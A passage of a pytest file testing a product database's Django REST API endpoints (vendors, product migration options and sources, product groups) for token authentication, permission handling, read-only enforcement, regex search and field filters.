        :return:
        """
        expected_result = {
            "pagination": {
                "page": 1,
                "page_records": 1,
                "url": {
                    "next": None,
                    "previous": None
                },
                "last_page": 1,
                "total_records": 1
            },
            "data": [
                {
                    "name": "Cisco Systems",
                    "id": 1,
                    "url": "http://testserver/productdb/api/v1/vendors/1/"
                }
            ]
        }
        # this name contains "Ci" but does not start with it, so the anchored
        # search below must not match it
        mixer.blend("productdb.Vendor", name="CCCCCCCi")
        client = APIClient()
        client.login(**AUTH_USER)
        # verify the use of regular expressions
        response = client.get(REST_VENDOR_LIST + "?search=" + quote("^Ci"))
        assert response.status_code == status.HTTP_200_OK
        jdata = response.json()
        assert "pagination" in jdata, "pagination information not provided"
        assert "data" in jdata, "data branch not provided"
        assert jdata == expected_result, "unexpected result from API endpoint"

    def test_filter_fields(self):
        """The id and name filters require an exact match."""
        expected_result = {
            "pagination": {
                "page": 1,
                "page_records": 1,
                "url": {
                    "next": None,
                    "previous": None
                },
                "last_page": 1,
                "total_records": 1
            },
            "data": [
                {
                    "name": "Cisco Systems",
                    "id": 1,
                    "url": "http://testserver/productdb/api/v1/vendors/1/"
                }
            ]
        }
        client = APIClient()
        client.login(**AUTH_USER)
        # use ID field filter (exact match)
        response = client.get(REST_VENDOR_LIST + "?id=1")
        assert response.status_code == status.HTTP_200_OK
        jdata = response.json()
        assert "pagination" in jdata, "pagination information not provided"
        assert "data" in jdata, "data branch not provided"
        assert jdata == expected_result, "unexpected result from API endpoint"
        # use name field
        response = client.get(REST_VENDOR_LIST + "?name=" + quote("Cisco Systems"))
        assert response.status_code == status.HTTP_200_OK
        jdata = response.json()
        assert "pagination" in jdata, "pagination information not provided"
        assert "data" in jdata, "data branch not provided"
        assert jdata == expected_result, "unexpected result from API endpoint"
        # call with empty result
        response = client.get(REST_VENDOR_LIST + "?name=" + quote("Cisco"))
        assert response.status_code == status.HTTP_200_OK
        jdata = response.json()
        assert "pagination" in jdata, "pagination information not provided"
        assert "data" in jdata, "data branch not provided"
        assert jdata["pagination"]["total_records"] == 0, "should return nothing, because an exact match is required"
@pytest.mark.usefixtures("import_default_users")
@pytest.mark.usefixtures("import_default_vendors")
class TestProductMigrationOptionAPIEndpoint:
    """
    Django REST Framework API endpoint tests for the ProductMigrationOption model
    """
    # The endpoint is read only: every write method (POST/PUT/DELETE) must
    # return 405 even for users that hold the matching model permission.
    def test_token_authentication(self, live_server):
        # A valid API token is accepted; an invalid one is rejected with 401.
        token, _ = Token.objects.get_or_create(user=User.objects.get(username=AUTH_USER["username"]))
        response = requests.get(live_server + REST_PRODUCTMIGRATIONOPTION_LIST, headers={
            "Authorization": "Token %s" % token.key
        })
        assert response.status_code == status.HTTP_200_OK, response.text
        response = requests.get(live_server + REST_PRODUCTMIGRATIONOPTION_LIST, headers={
            "Authorization": "Token invalid_token"
        })
        assert response.status_code == status.HTTP_401_UNAUTHORIZED
    def test_read_access_with_authenticated_user(self):
        # Expected list payload; the %d placeholder in each "url" entry is
        # filled in further below once the real database IDs are known.
        expected_result = {
            "pagination": {
                "page": 1,
                "page_records": 2,
                "url": {
                    "next": None,
                    "previous": None
                },
                "last_page": 1,
                "total_records": 2
            },
            "data": [
                {
                    "migration_source": 1,
                    "migration_product_info_url": None,
                    "url": "http://testserver/productdb/api/v1/productmigrationoptions/%d/",
                    "replacement_product_id": "replacement",
                    "id": 1,
                    "product": 1,
                    "comment": "",
                },
                {
                    "migration_source": 1,
                    "migration_product_info_url": None,
                    "url": "http://testserver/productdb/api/v1/productmigrationoptions/%d/",
                    "replacement_product_id": "replacement2",
                    "id": 2,
                    "product": 2,
                    "comment": "",
                }
            ]
        }
        p1 = mixer.blend("productdb.Product", vendor=Vendor.objects.get(id=1), id=1, product_id="B")
        p2 = mixer.blend("productdb.Product", vendor=Vendor.objects.get(id=1), id=2, product_id="A")
        pmg = mixer.blend("productdb.ProductMigrationSource", name="Cisco", id=1)
        pmo1 = mixer.blend("productdb.ProductMigrationOption", product=p1, migration_source=pmg,
                           replacement_product_id=expected_result["data"][0]["replacement_product_id"], comment="")
        pmo2 = mixer.blend("productdb.ProductMigrationOption", product=p2, migration_source=pmg,
                           replacement_product_id=expected_result["data"][1]["replacement_product_id"], comment="")
        # patch the expected payload with the IDs assigned by the database
        expected_result["data"][0]["id"] = pmo1.id
        expected_result["data"][0]["url"] = expected_result["data"][0]["url"] % pmo1.id
        expected_result["data"][0]["comment"] = pmo1.comment
        expected_result["data"][1]["id"] = pmo2.id
        expected_result["data"][1]["url"] = expected_result["data"][1]["url"] % pmo2.id
        expected_result["data"][1]["comment"] = pmo2.comment
        client = APIClient()
        client.login(**AUTH_USER)
        response = client.get(REST_PRODUCTMIGRATIONOPTION_LIST)
        assert response.status_code == status.HTTP_200_OK
        jdata = response.json()
        assert "pagination" in jdata, "pagination information not provided"
        assert "data" in jdata, "data branch not found in result"
        assert jdata == expected_result, "unexpected result from API endpoint"
        # access first element of the list
        response = client.get(jdata["data"][0]["url"])
        assert response.status_code == status.HTTP_200_OK
        assert jdata["data"][0] == response.json()
    def test_add_access_with_permission(self):
        # Even with the add permission, POST is rejected (read-only endpoint).
        test_user = "user"
        u = User.objects.create_user(test_user, "", test_user)
        p = Permission.objects.get(codename="add_productmigrationoption")
        assert p is not None
        u.user_permissions.add(p)
        u.save()
        assert u.has_perm("productdb.add_productmigrationoption")
        client = APIClient()
        client.login(username=test_user, password=test_user)
        # NOTE(review): the posted key "replacement_id" does not match the model
        # field name "replacement_product_id"; harmless here because the request
        # is rejected with 405 before validation -- confirm
        response = client.post(REST_PRODUCTMIGRATIONOPTION_LIST,
                               data={"replacement_id": "Awesome Product Migration Option"})
        assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED, "API endpoint is always read only"
        assert response.json() == {'detail': 'Method "POST" not allowed.'}
        assert ProductMigrationOption.objects.count() == 0, "no additional product migration option is created"
    def test_change_access_with_permission(self):
        # Even with the change permission, PUT is rejected (read-only endpoint).
        # create a user with permissions
        test_user = "user"
        u = User.objects.create_user(test_user, "", test_user)
        p = Permission.objects.get(codename="change_productmigrationoption")
        assert p is not None
        u.user_permissions.add(p)
        u.save()
        assert u.has_perm("productdb.change_productmigrationoption")
        mixer.blend("productdb.productmigrationoption")
        client = APIClient()
        client.login(username=test_user, password=test_user)
        response = client.put(REST_PRODUCTMIGRATIONOPTION_DETAIL % 1, data={"comment": "renamed product migration source"})
        assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED, "API endpoint is always read only"
        assert response.json() == {'detail': 'Method "PUT" not allowed.'}
    def test_delete_access_with_permission(self):
        # Even with the delete permission, DELETE is rejected (read-only endpoint).
        test_user = "user"
        u = User.objects.create_user(test_user, "", test_user)
        p = Permission.objects.get(codename="delete_productmigrationoption")
        assert p is not None
        u.user_permissions.add(p)
        u.save()
        assert u.has_perm("productdb.delete_productmigrationoption")
        mixer.blend("productdb.productmigrationoption")
        client = APIClient()
        client.login(username=test_user, password=test_user)
        response = client.delete(REST_PRODUCTMIGRATIONOPTION_DETAIL % 1)
        assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED, "API endpoint is always read only"
        assert response.json() == {'detail': 'Method "DELETE" not allowed.'}
        assert ProductMigrationOption.objects.count() == 1, "no product migration option was deleted"
    def test_search_field(self):
        """
        search field contains a regular expression on the product id of the migration option and on the
        replacement product id
        :return:
        """
        expected_result = {
            "pagination": {
                "page": 1,
                "page_records": 2,
                "url": {
                    "next": None,
                    "previous": None
                },
                "last_page": 1,
                "total_records": 2
            },
            "data": [
                {
                    "migration_source": 1,
                    "migration_product_info_url": None,
                    "url": "http://testserver/productdb/api/v1/productmigrationoptions/%d/",
                    "replacement_product_id": "replacement",
                    "id": 1,
                    "product": 1,
                    "comment": "",
                },
                {
                    "migration_source": 1,
                    "migration_product_info_url": None,
                    "url": "http://testserver/productdb/api/v1/productmigrationoptions/%d/",
                    "replacement_product_id": "replacement2",
                    "id": 2,
                    "product": 2,
                    "comment": "",
                }
            ]
        }
        # p3 ("B1") must not match the anchored "^A" search below
        p1 = mixer.blend("productdb.Product", vendor=Vendor.objects.get(id=1), id=1, product_id="A1")
        p2 = mixer.blend("productdb.Product", vendor=Vendor.objects.get(id=1), id=2, product_id="A2")
        p3 = mixer.blend("productdb.Product", vendor=Vendor.objects.get(id=1), id=3, product_id="B1")
        pmg = mixer.blend("productdb.ProductMigrationSource", name="Cisco", id=1)
        pmo1 = mixer.blend("productdb.ProductMigrationOption", product=p1, migration_source=pmg,
                           replacement_product_id=expected_result["data"][0]["replacement_product_id"], comment="")
        pmo2 = mixer.blend("productdb.ProductMigrationOption", product=p2, migration_source=pmg,
                           replacement_product_id=expected_result["data"][1]["replacement_product_id"], comment="")
        mixer.blend("productdb.ProductMigrationOption", product=p3, migration_source=pmg,
                    replacement_product_id=expected_result["data"][1]["replacement_product_id"], comment="")
        # patch the expected payload with the IDs assigned by the database
        expected_result["data"][0]["id"] = pmo1.id
        expected_result["data"][0]["url"] = expected_result["data"][0]["url"] % pmo1.id
        expected_result["data"][0]["comment"] = pmo1.comment
        expected_result["data"][1]["id"] = pmo2.id
        expected_result["data"][1]["url"] = expected_result["data"][1]["url"] % pmo2.id
        expected_result["data"][1]["comment"] = pmo2.comment
        client = APIClient()
        client.login(**AUTH_USER)
        # verify the use of regular expressions
        response = client.get(REST_PRODUCTMIGRATIONOPTION_LIST + "?search=" + quote("^A"))
        assert response.status_code == status.HTTP_200_OK
        jdata = response.json()
        assert "pagination" in jdata, "pagination information not provided"
        assert "data" in jdata, "data branch not provided"
        assert jdata == expected_result, "unexpected result from API endpoint"
    def test_filter_fields(self):
        """Verify the id, replacement_product_id, product and migration_source filters."""
        expected_result = {
            "pagination": {
                "page": 1,
                "page_records": 2,
                "url": {
                    "next": None,
                    "previous": None
                },
                "last_page": 1,
                "total_records": 2
            },
            "data": [
                {
                    "migration_source": 1,
                    "migration_product_info_url": None,
                    "url": "http://testserver/productdb/api/v1/productmigrationoptions/%d/",
                    "replacement_product_id": "replacement1",
                    "id": 1,
                    "product": 1,
                    "comment": "",
                },
                {
                    "migration_source": 2,
                    "migration_product_info_url": None,
                    "url": "http://testserver/productdb/api/v1/productmigrationoptions/%d/",
                    "replacement_product_id": "replacement2",
                    "id": 2,
                    "product": 2,
                    "comment": "",
                }
            ]
        }
        p1 = mixer.blend("productdb.Product", vendor=Vendor.objects.get(id=1), id=1, product_id="A1")
        p2 = mixer.blend("productdb.Product", vendor=Vendor.objects.get(id=1), id=2, product_id="A2")
        p3 = mixer.blend("productdb.Product", vendor=Vendor.objects.get(id=1), id=3, product_id="B1")
        pmg = mixer.blend("productdb.ProductMigrationSource", name="Cisco", id=1)
        pmg2 = mixer.blend("productdb.ProductMigrationSource", name="Other", id=2)
        pmo1 = mixer.blend("productdb.ProductMigrationOption", product=p1, migration_source=pmg,
                           replacement_product_id=expected_result["data"][0]["replacement_product_id"], comment="")
        pmo2 = mixer.blend("productdb.ProductMigrationOption", product=p2, migration_source=pmg2,
                           replacement_product_id=expected_result["data"][1]["replacement_product_id"], comment="")
        mixer.blend("productdb.ProductMigrationOption", product=p3, migration_source=pmg2,
                    replacement_product_id=expected_result["data"][1]["replacement_product_id"], comment="")
        # patch the expected payload with the IDs assigned by the database
        expected_result["data"][0]["id"] = pmo1.id
        expected_result["data"][0]["url"] = expected_result["data"][0]["url"] % pmo1.id
        expected_result["data"][0]["comment"] = pmo1.comment
        expected_result["data"][1]["id"] = pmo2.id
        expected_result["data"][1]["url"] = expected_result["data"][1]["url"] % pmo2.id
        expected_result["data"][1]["comment"] = pmo2.comment
        client = APIClient()
        client.login(**AUTH_USER)
        # use ID field filter (exact match)
        response = client.get(REST_PRODUCTMIGRATIONOPTION_LIST + "?id=%s" % pmo1.id)
        assert response.status_code == status.HTTP_200_OK
        jdata = response.json()
        assert "pagination" in jdata, "pagination information not provided"
        assert "data" in jdata, "data branch not provided"
        # NOTE(review): no copy is made here -- mod_res ALIASES expected_result,
        # so the mutations below (pagination rewrite and del of data[1]) also
        # shrink expected_result to one record. The assert against
        # expected_result that follows only passes because of this aliasing;
        # confirm before "fixing" it with a deepcopy.
        mod_res = expected_result
        mod_res["pagination"] = {
            "page": 1,
            "page_records": 1,
            "url": {
                "next": None,
                "previous": None
            },
            "last_page": 1,
            "total_records": 1
        }
        del mod_res["data"][1]
        assert jdata == expected_result, "unexpected result from API endpoint"
        # use replacement_product_id field filter (startswith match)
        response = client.get(REST_PRODUCTMIGRATIONOPTION_LIST + "?replacement_product_id=" + quote("replacement1"))
        assert response.status_code == status.HTTP_200_OK
        jdata = response.json()
        assert "pagination" in jdata, "pagination information not provided"
        assert "data" in jdata, "data branch not provided"
        assert jdata == mod_res, "unexpected result from API endpoint"
        # use product field filter (startswith match)
        response = client.get(REST_PRODUCTMIGRATIONOPTION_LIST + "?product=" + quote("A1"))
        assert response.status_code == status.HTTP_200_OK
        jdata = response.json()
        assert "pagination" in jdata, "pagination information not provided"
        assert "data" in jdata, "data branch not provided"
        assert jdata == mod_res, "unexpected result from API endpoint"
        # use migration_source field filter (startswith match)
        response = client.get(REST_PRODUCTMIGRATIONOPTION_LIST + "?migration_source=" + quote("Cisco"))
        assert response.status_code == status.HTTP_200_OK
        jdata = response.json()
        assert "pagination" in jdata, "pagination information not provided"
        assert "data" in jdata, "data branch not provided"
        assert jdata == mod_res, "unexpected result from API endpoint"
        # call with empty result
        response = client.get(REST_PRODUCTMIGRATIONOPTION_LIST + "?replacement_product_id=" + quote("invalid"))
        assert response.status_code == status.HTTP_200_OK
        jdata = response.json()
        assert "pagination" in jdata, "pagination information not provided"
        assert "data" in jdata, "data branch not provided"
        assert jdata["pagination"]["total_records"] == 0, "should return nothing, because an exact match is required"
@pytest.mark.usefixtures("import_default_users")
@pytest.mark.usefixtures("import_default_vendors")
class TestProductMigrationSourceAPIEndpoint:
    """
    Django REST Framework API endpoint tests for the ProductMigrationSource model
    """

    @staticmethod
    def _client_with_permission(codename):
        """Create a throwaway user holding only the given productdb permission and
        return an APIClient logged in as that user.

        Extracted because the add/change/delete tests repeated this setup verbatim.
        """
        test_user = "user"
        u = User.objects.create_user(test_user, "", test_user)
        p = Permission.objects.get(codename=codename)
        assert p is not None
        u.user_permissions.add(p)
        u.save()
        assert u.has_perm("productdb.%s" % codename)
        client = APIClient()
        client.login(username=test_user, password=test_user)
        return client

    def test_token_authentication(self, live_server):
        """A valid API token is accepted, an invalid one is rejected with 401."""
        token, _ = Token.objects.get_or_create(user=User.objects.get(username=AUTH_USER["username"]))
        response = requests.get(live_server + REST_PRODUCTMIGRATIONSOURCE_LIST, headers={
            "Authorization": "Token %s" % token.key
        })
        assert response.status_code == status.HTTP_200_OK, response.text
        response = requests.get(live_server + REST_PRODUCTMIGRATIONSOURCE_LIST, headers={
            "Authorization": "Token invalid_token"
        })
        assert response.status_code == status.HTTP_401_UNAUTHORIZED

    def test_read_access_with_authenticated_user(self):
        """List and detail views return the expected JSON for an authenticated user."""
        expected_result = {
            "pagination": {
                "page": 1,
                "page_records": 2,
                "url": {
                    "next": None,
                    "previous": None
                },
                "last_page": 1,
                "total_records": 2
            },
            "data": [
                {
                    "id": 1,
                    "preference": 50,
                    "url": "http://testserver/productdb/api/v1/productmigrationsources/1/",
                    "description": "My description",
                    "name": "Cisco",
                },
                {
                    "id": 2,
                    "preference": 50,
                    "url": "http://testserver/productdb/api/v1/productmigrationsources/2/",
                    "description": "My other description",
                    "name": "other",
                }
            ]
        }
        # create one ProductMigrationSource per expected entry (plain loop -- the
        # original used a list comprehension purely for its side effects)
        for entry in expected_result["data"]:
            mixer.blend("productdb.ProductMigrationSource", **entry)
        client = APIClient()
        client.login(**AUTH_USER)
        response = client.get(REST_PRODUCTMIGRATIONSOURCE_LIST)
        assert response.status_code == status.HTTP_200_OK
        jdata = response.json()
        assert "pagination" in jdata, "pagination information not provided"
        assert "data" in jdata, "data branch not found in result"
        assert jdata == expected_result, "unexpected result from API endpoint"
        # access first element of the list
        response = client.get(jdata["data"][0]["url"])
        assert response.status_code == status.HTTP_200_OK
        assert jdata["data"][0] == response.json()

    def test_add_access_with_permission(self):
        """POST is rejected with 405 even when the user holds the add permission."""
        client = self._client_with_permission("add_productmigrationsource")
        response = client.post(REST_PRODUCTMIGRATIONSOURCE_LIST, data={"name": "Awesome Product Migration Source"})
        assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED, "API endpoint is always read only"
        assert response.json() == {'detail': 'Method "POST" not allowed.'}
        assert ProductMigrationSource.objects.count() == 0, "no additional vendor is created"

    def test_change_access_with_permission(self):
        """PUT is rejected with 405 even when the user holds the change permission."""
        client = self._client_with_permission("change_productmigrationsource")
        mixer.blend("productdb.productmigrationsource")
        response = client.put(REST_PRODUCTMIGRATIONSOURCE_DETAIL % 1, data={"name": "renamed product migration source"})
        assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED, "API endpoint is always read only"
        assert response.json() == {'detail': 'Method "PUT" not allowed.'}

    def test_delete_access_with_permission(self):
        """DELETE is rejected with 405 even when the user holds the delete permission."""
        client = self._client_with_permission("delete_productmigrationsource")
        mixer.blend("productdb.productmigrationsource")
        response = client.delete(REST_PRODUCTMIGRATIONSOURCE_DETAIL % 1)
        assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED, "API endpoint is always read only"
        assert response.json() == {'detail': 'Method "DELETE" not allowed.'}
        assert ProductMigrationSource.objects.count() == 1, "no product migration source was deleted"

    def test_search_field(self):
        """
        search field implementation contains a regular expression search on the vendor name field
        :return:
        """
        expected_result = {
            "pagination": {
                "page": 1,
                "page_records": 1,
                "url": {
                    "next": None,
                    "previous": None
                },
                "last_page": 1,
                "total_records": 1
            },
            "data": [
                {
                    "name": "Cisco Systems",
                    "url": "http://testserver/productdb/api/v1/productmigrationsources/%d/",
                    "id": 1,
                    "preference": 50,
                    "description": None,
                }
            ]
        }
        pmg = mixer.blend("productdb.productmigrationsource", name="Cisco Systems")
        # patch the expected payload with the ID assigned by the database
        expected_result["data"][0]["id"] = pmg.id
        expected_result["data"][0]["url"] = expected_result["data"][0]["url"] % pmg.id
        # this entry must not match the anchored "^Ci" search below
        mixer.blend("productdb.productmigrationsource", name="Other PMG")
        client = APIClient()
        client.login(**AUTH_USER)
        # verify the use of regular expressions
        response = client.get(REST_PRODUCTMIGRATIONSOURCE_LIST + "?search=" + quote("^Ci"))
        assert response.status_code == status.HTTP_200_OK
        jdata = response.json()
        assert "pagination" in jdata, "pagination information not provided"
        assert "data" in jdata, "data branch not provided"
        assert jdata == expected_result, "unexpected result from API endpoint"

    def test_filter_fields(self):
        """The id and name filters require an exact match."""
        expected_result = {
            "pagination": {
                "page": 1,
                "page_records": 1,
                "url": {
                    "next": None,
                    "previous": None
                },
                "last_page": 1,
                "total_records": 1
            },
            "data": [
                {
                    "description": None,
                    "id": 1,
                    "name": "Cisco Systems",
                    "preference": 50,
                    "url": "http://testserver/productdb/api/v1/productmigrationsources/%d/"
                }
            ]
        }
        pmg = mixer.blend("productdb.productmigrationsource", name="Cisco Systems")
        # patch the expected payload with the ID assigned by the database
        expected_result["data"][0]["id"] = pmg.id
        expected_result["data"][0]["url"] = expected_result["data"][0]["url"] % pmg.id
        mixer.blend("productdb.productmigrationsource", name="Other PMG")
        client = APIClient()
        client.login(**AUTH_USER)
        # use ID field filter (exact match)
        response = client.get(REST_PRODUCTMIGRATIONSOURCE_LIST + "?id=%s" % pmg.id)
        assert response.status_code == status.HTTP_200_OK
        jdata = response.json()
        assert "pagination" in jdata, "pagination information not provided"
        assert "data" in jdata, "data branch not provided"
        assert jdata == expected_result, "unexpected result from API endpoint"
        # use name field filter (exact match)
        response = client.get(REST_PRODUCTMIGRATIONSOURCE_LIST + "?name=" + quote("Cisco Systems"))
        assert response.status_code == status.HTTP_200_OK
        jdata = response.json()
        assert "pagination" in jdata, "pagination information not provided"
        assert "data" in jdata, "data branch not provided"
        assert jdata == expected_result, "unexpected result from API endpoint"
        # call with empty result
        response = client.get(REST_PRODUCTMIGRATIONSOURCE_LIST + "?name=" + quote("Cisco"))
        assert response.status_code == status.HTTP_200_OK
        jdata = response.json()
        assert "pagination" in jdata, "pagination information not provided"
        assert "data" in jdata, "data branch not provided"
        assert jdata["pagination"]["total_records"] == 0, "should return nothing, because an exact match is required"
@pytest.mark.usefixtures("import_default_users")
@pytest.mark.usefixtures("import_default_vendors")
class TestProductGroupAPIEndpoint:
"""Django REST Framework API endpoint tests for the Product Group model"""
def test_token_authentication(self, live_server):
token, _ = Token.objects.get_or_create(user=User.objects.get(username=AUTH_USER["username"]))
response = requests.get(live_server + REST_PRODUCT_GROUP_LIST, headers={
"Authorization": "Token %s" % token.key
})
assert response.status_code == status.HTTP_200_OK, response.text
response = requests.get(live_server + REST_PRODUCT_GROUP_LIST, headers={
"Authorization": "Token invalid_token"
})
assert response.status_code == status.HTTP_401_UNAUTHORIZED
def test_read_access_with_authenticated_user(self):
expected_result = {
"data": [
{
"url": "http://testserver/productdb/api/v1/productgroups/1/",
"name": "product group 1",
"id": 1,
"vendor": 0
},
{
"url": "http://testserver/productdb/api/v1/productgroups/2/",
"name": "product group 2",
"id": 2,
"vendor": 0
},
{
"url": "http://testserver/productdb/api/v1/productgroups/3/",
"name": "product group 3",
"id": 3,
"vendor": 0
}
],
"pagination": {
"page_records": 3,
"last_page": 1,
"url": {
"next": None,
"previous": None
},
"page": 1,
"total_records": 3
}
}
mixer.blend("productdb.ProductGroup", name="product group 1")
mixer.blend("productdb.ProductGroup", name="product group 2")
mixer.blend("productdb.ProductGroup", name="product group 3")
client = APIClient()
client.login(**AUTH_USER)
response = client.get(REST_PRODUCT_GROUP_LIST)
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not found in result"
# adjust ID values from Database
for c in range(0, 3):
expected_result["data"][c]["id"] = ProductGroup.objects.get(name="product group %d" % (c+1)).id
expected_result["data"][c]["url"] = "http://testserver/productdb/api/v1/productgroups/%d/" % expected_result["data"][c]["id"]
assert jdata == expected_result, "unexpected result from API endpoint"
# access first element of the list
response = client.get(jdata["data"][0]["url"])
assert response.status_code == status.HTTP_200_OK
assert jdata["data"][0] == response.json()
def test_add_access_with_permission(self):
test_user = "user"
test_product_group_name = "Test Product Group"
expected_result = {
"vendor": 1,
"name": test_product_group_name,
"url": "http://testserver/productdb/api/v1/productgroups/1/",
"id": 1
}
u = User.objects.create_user(test_user, "", test_user)
p = Permission.objects.get(codename="add_productgroup")
assert p is not None
u.user_permissions.add(p)
u.save()
assert u.has_perm("productdb.add_productgroup")
client = APIClient()
client.login(username=test_user, password=test_user)
# create with name
response = client.post(REST_PRODUCT_GROUP_LIST, data={"name": test_product_group_name})
assert response.status_code == status.HTTP_400_BAD_REQUEST
assert response.json() == {'vendor': ['This field is required.']}
# create with name name and Vendor ID
response = client.post(REST_PRODUCT_GROUP_LIST, data={"name": test_product_group_name, "vendor": 1})
assert response.status_code == status.HTTP_201_CREATED
# adjust ID values from Database
expected_result["id"] = ProductGroup.objects.get(name=test_product_group_name).id
expected_result["url"] = "http://testserver/productdb/api/v1/productgroups/%d/" % expected_result["id"]
assert response.json() == expected_result, "Should provide the new product group"
def test_change_access_with_permission(self):
test_product_group = "renamed product group"
pg = mixer.blend("productdb.ProductGroup", name="product group")
expected_result = {
"url": "http://testserver/productdb/api/v1/productgroups/%d/",
"vendor": 0,
"name": test_product_group,
"id": 0
}
# create a user with permissions
test_user = "user"
u = User.objects.create_user(test_user, "", test_user)
p = Permission.objects.get(codename="change_productgroup")
assert p is not None
u.user_permissions.add(p)
u.save()
assert u.has_perm("productdb.change_productgroup")
client = APIClient()
client.login(username=test_user, password=test_user)
response = client.put(REST_PRODUCT_GROUP_DETAIL % pg.id, data={"name": test_product_group})
assert response.status_code == status.HTTP_200_OK
# adjust pk value
expected_result["id"] = ProductGroup.objects.get(name=test_product_group).id
expected_result["url"] = expected_result["url"] % expected_result["id"]
assert response.json() == expected_result
def test_delete_access_with_permission(self):
pg = mixer.blend("productdb.ProductGroup")
assert ProductGroup.objects.count() == 1
test_user = "user"
u = User.objects.create_user(test_user, "", test_user)
p = Permission.objects.get(codename="delete_productgroup")
assert p is not None
u.user_permissions.add(p)
u.save()
assert u.has_perm("productdb.delete_productgroup")
client = APIClient()
client.login(username=test_user, password=test_user)
response = client.delete(REST_PRODUCT_GROUP_DETAIL % pg.id)
assert response.status_code == status.HTTP_204_NO_CONTENT
assert ProductGroup.objects.count() == 0
def test_count_endpoint(self):
mixer.blend("productdb.ProductGroup", name="product group 1")
mixer.blend("productdb.ProductGroup", name="product group 2")
mixer.blend("productdb.ProductGroup", name="product group 3")
assert ProductGroup.objects.count() == 3
client = APIClient()
client.login(**AUTH_USER)
response = client.get(REST_PRODUCT_GROUP_COUNT)
assert response.status_code == status.HTTP_200_OK
assert response.json() == {'count': 3}
def test_search_field(self):
expected_result = {
"pagination": {
"page": 1,
"page_records": 5,
"url": {
"next": None,
"previous": None
},
"last_page": 1,
"total_records": 5
},
"data": [
{
"vendor": 0,
"id": 0,
"name": "product group 0",
"url": "http://testserver/productdb/api/v1/productgroups/%d/"
},
{
"vendor": 0,
"id": 0,
"name": "product group 1",
"url": "http://testserver/productdb/api/v1/productgroups/%d/"
},
{
"vendor": 0,
"id": 0,
"name": "product group 2",
"url": "http://testserver/productdb/api/v1/productgroups/%d/"
},
{
"vendor": 0,
"id": 0,
"name": "product group 3",
"url": "http://testserver/productdb/api/v1/productgroups/%d/"
},
{
"vendor": 0,
"id": 0,
"name": "product group 4",
"url": "http://testserver/productdb/api/v1/productgroups/%d/"
}
]
}
for e in range(0, 5):
ProductGroup.objects.create(name="product group %d" % e)
client = APIClient()
client.login(**AUTH_USER)
# verify the use of regular expressions
response = client.get(REST_PRODUCT_GROUP_LIST + "?search=" + quote("^product group \d+$"))
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not provided"
assert jdata["pagination"]["total_records"] == 5, "Should contain five elements"
# adjust pk values
for e in range(0, 5):
expected_result["data"][e]["id"] = ProductGroup.objects.get(name="product group %d" % e).id
expected_result["data"][e]["url"] = expected_result["data"][e]["url"] % expected_result["data"][e]["id"]
assert jdata == expected_result, "unexpected result from API endpoint"
def test_filter_id_field(self):
expected_result = {
"pagination": {
"page": 1,
"page_records": 1,
"url": {
"next": None,
"previous": None
},
"last_page": 1,
"total_records": 1
},
"data": [
{
"vendor": 0,
"id": 1,
"name": "TBD",
"url": "http://testserver/productdb/api/v1/productgroups/%d/"
},
]
}
pg = mixer.blend("productdb.ProductGroup", vendor=Vendor.objects.get(id=1))
expected_result["data"][0]["id"] = pg.id
expected_result["data"][0]["vendor"] = pg.vendor.id
expected_result["data"][0]["name"] = pg.name
expected_result["data"][0]["url"] = expected_result["data"][0]["url"] % expected_result["data"][0]["id"]
assert ProductGroup.objects.count() == 1
client = APIClient()
client.login(**AUTH_USER)
# use ID field filter (exact match)
response = client.get(REST_PRODUCT_GROUP_LIST + "?id=%d" % pg.id)
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not provided"
assert jdata["pagination"]["total_records"] == 1, "Expect a single entry in the result"
assert jdata == expected_result, "unexpected result from API endpoint"
def test_filter_name_field(self):
expected_result = {
"pagination": {
"page": 1,
"page_records": 1,
"url": {
"next": None,
"previous": None
},
"last_page": 1,
"total_records": 1
},
"data": [
{
"vendor": 0,
"id": 1,
"name": "",
"url": "http://testserver/productdb/api/v1/productgroups/%d/"
},
]
}
pg = mixer.blend("productdb.ProductGroup", vendor=Vendor.objects.get(id=1))
expected_result["data"][0]["id"] = pg.id
expected_result["data"][0]["vendor"] = pg.vendor.id
expected_result["data"][0]["name"] = pg.name
expected_result["data"][0]["url"] = expected_result["data"][0]["url"] % expected_result["data"][0]["id"]
assert ProductGroup.objects.count() == 1
client = APIClient()
client.login(**AUTH_USER)
# use name field (exact match)
response = client.get(REST_PRODUCT_GROUP_LIST + "?name=" + quote(pg.name))
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not provided"
assert jdata["pagination"]["total_records"] == 1, "Expect a single entry in the result"
assert jdata == expected_result, "unexpected result from API endpoint"
def test_filter_vendor_field(self):
expected_result = {
"pagination": {
"page": 1,
"page_records": 1,
"url": {
"next": None,
"previous": None
},
"last_page": 1,
"total_records": 1
},
"data": [
{
"vendor": 0,
"id": 1,
"name": "TBD",
"url": "http://testserver/productdb/api/v1/productgroups/%d/"
},
]
}
pg = mixer.blend("productdb.ProductGroup", vendor=Vendor.objects.get(id=1))
expected_result["data"][0]["id"] = pg.id
expected_result["data"][0]["vendor"] = pg.vendor.id
expected_result["data"][0]["name"] = pg.name
expected_result["data"][0]["url"] = expected_result["data"][0]["url"] % expected_result["data"][0]["id"]
assert ProductGroup.objects.count() == 1
client = APIClient()
client.login(**AUTH_USER)
# use vendor field (startswith)
response = client.get(REST_PRODUCT_GROUP_LIST + "?vendor=" + quote("Cisco"))
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not provided"
assert jdata["pagination"]["total_records"] == 1, "Expect a single entry in the result"
assert jdata == expected_result, "unexpected result from API endpoint"
@pytest.mark.usefixtures("import_default_users")
@pytest.mark.usefixtures("import_default_vendors")
class TestProductAPIEndpoint:
    """Django REST Framework API endpoint tests for the Product model"""
    # today's date rendered with the configured short date format; used by the
    # tests below to compare the update/list-price timestamps
